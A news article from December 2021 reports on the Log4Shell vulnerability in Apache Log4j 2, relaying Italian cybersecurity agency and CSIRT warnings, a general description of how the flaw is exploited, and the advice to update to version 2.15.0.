Cybersecurity, Apache puts global servers at risk: alarm from the National Agency

The body led by Roberto Baldoni warns about the Log4j open source module on which various applications depend. The first signs of exploitation of the bug recorded on Minecraft 13 Dec 2021 Domenico Aliperto

In the past 48 hours, a critical vulnerability has been recorded by several cybersecurity experts. This is Log4Shell, which plagues the Apache Project's open source log4j module, at the heart of many applications hosted by servers around the world. This was announced by the National Cybersecurity Agency. The first signs of Log4shell exploitation seem to have appeared on Minecraft, Microsoft's video game platform, but now technological giants such as Amazon, Apple, Twitter, who are running for cover to protect themselves, would also be threatened. Index of topics • What vulnerability implies • Apache announces the resolution of the vulnerability

What vulnerability implies

"This involves the presence of a vast and diversified attack surface on the entire Internet network", reads a note, "and considering its simplicity of exploitation, even by unsophisticated actors, makes the reported vulnerability particularly serious" .

The technicians of the National Cybersecurity Agency, in constant contact with their European and international counterparts, recommend, given the danger of the vulnerability, "to minimize its exposure on the internet by applying the necessary measures to their servers in the shortest time possible". The Italian chapter of the Csirt (Computer Security Incident Response Team) is publishing security updates on its portal, including the procedures to resolve the aforementioned vulnerability, to which the technical managers of public and private IT services are invited to refer. "The vulnerability of critical level" explains Csirt, "which is assigned the maximum score (CVSSv3: 10) as it allows remote code execution without authentication, is known as Log4Shell and affects Java-based applications that use the Log4j 2 product from version 2.0 up to 2.14.1. Any exploitation of the flaw allows the execution of arbitrary code to the detriment of the affected application. Attackers, who do not require prior access to the system, can send a malformed https request via a specially prepared string, to generate a log on Log4j - which uses Jndi (Java Naming and Directory Interface) - in order to record the malicious string in the application log. During the processing of the registry ", Csirt continues," the vulnerable system will be in a position to execute the code specifically entered by the attacker. This condition can, for example, lead the application to make a request to a malicious domain to execute a malicious payload ". In this way, it will be possible for the attacker to acquire control of the affected application and complete access to the system.

Apache announces the resolution of the vulnerability

Log4j 2 is a logging library widely used in the development of business systems, it is in fact included in various open-source software and often directly integrated into important software applications. For this reason, the scope of the impact is potentially extended to thousands of products and devices, including those from Apache such as: Struts 2, Solr, Druid, Flink and Swift. Since a Java library is affected, which is by nature multiplatform, the impact affects both Windows and Linux architectures, and backend systems and microservices are also potentially vulnerable. Apache software foundation explains that the vulnerability was addressed in the Log4j 2.15.0 update. The suggestion of the Csirt is to install it and, if this is not possible, reduce the attack surface with a series of measures that are indicated. "Because many Java-based applications can take advantage of Log4j 2," the agency team warns, "organizations should consider contacting application vendors or making sure their Java applications are running the latest available version of the product."

ALARM ARTICLE COMMENT We have not used this library as for updating 3 billion computers… .wishes